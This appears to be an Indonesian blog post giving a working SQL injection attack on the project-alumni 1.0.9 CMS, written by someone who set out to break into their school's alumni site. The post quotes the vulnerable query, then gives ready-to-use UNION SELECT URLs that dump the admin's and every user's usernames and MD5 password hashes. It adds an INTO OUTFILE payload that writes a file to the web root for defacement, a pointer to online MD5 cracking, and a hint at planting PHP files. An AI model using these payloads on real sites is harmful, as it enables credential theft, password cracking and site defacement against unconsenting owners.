....
   
  Selamat datang
  sql injection pada project-alumni 1.0.9
 

Kisah ini terjadi karena website alumni smu ku menggunakan cms ini dan keisenganku untuk bisa masuk ke situs alumniku ini. Karena malas, aku mencoba mencari bug ataupun exploit dari project-alumni ini di internet, dan ternyata aku tidak menemukan apa yang kucari. Penasaran, akhirnya kuputuskan untuk mendownload dan menginstall cms ini di komputerku untuk mencari bug yg ada.

Setelah beberapa waktu, aku menemukan 2 kelemahan yaitu sql injection dan xss, kedua kelemahan itu berada pada beberapa tempat yg berbeda.

Sekarang saya hanya membahas masalah sql injectionnya.

Pada halaman view.page.inc.php terdapat parameter year yang tidak terfilter dengan baik, sehingga kita bisa melihat isi database yg ada atau mungkin defacement (sql injection juga terdapat pada halaman news.page.inc.php).

code:

$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_users` WHERE `alumniYear` = '".$_GET['year']."'");

Untuk melihat username dan password dari sang admin bisa kita gunakan

http://localhost/alumni1/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1

Atau untuk melihat semua username beserta passwordnya kita gunakan http://localhost/alumni1/index.php?act=view&year=2003' or alumniYear>1900 union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID>0 or ID='1

tomplixsee = username dari admin; 1651a07…… = md5 encript dari passwordnya admin

Setelah itu tinggal didecript aja. Dan kita bisa gunakan situs yang menawarkan crack md5 secara online, misalkan http://gdataonline.com.

Selain melihat isi database, kita juga bisa membuat suatu file baru di harddisk server (jika kita mempunyai permission yg cukup, hi..hi..). Terlebih dahulu kita bisa menuliskan isi file yg akan kita buat pada komentar.

http://localhost/alumni1/index.php?act=update

 

kemudian dengan sql injection kita masukkan komentar kita ke dalam file index.html yg akan kita buat.

http://localhost/alumni1/index.php?act=view&year=2003' union select 1,1,1,1,1,alumniNote,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where alumniUserName='newbie' into outfile 'E:/apache2triad/htdocs/alumni1/index.html

setelah itu kita buka http://localhost/alumni1

 

Dan tampilan utama situs telah berubah..

Diatas, kita hanya membuat file html, untuk hal yg lebih iseng kita bisa bikin file php yg berisi perintah-perintah nakal. Tapi tentunya, untuk membuat suatu file, kita harus tahu path lokal dari root document situs yg bersangkutan

Atas perhatiannya saya ucapkan terimakasih. Maaf bila ada hal yang kurang jelas ataupun salah.

Nb:

-untuk melakukan teknik ini dibutuhkan agar settingan magic_quote_gpc off, tapi ternyata banyak situs yang menggunakan cms ini yang bisa diserang dengan teknik diatas

-untuk melakukan teknik diatas kita harus terdaftar pada website yang bersangkutan

-project-alumni bisa didownload di https://sourceforge.net/projects/project-alumni/

 
   
 
=> Do you also want a homepage for free? Then click here! <=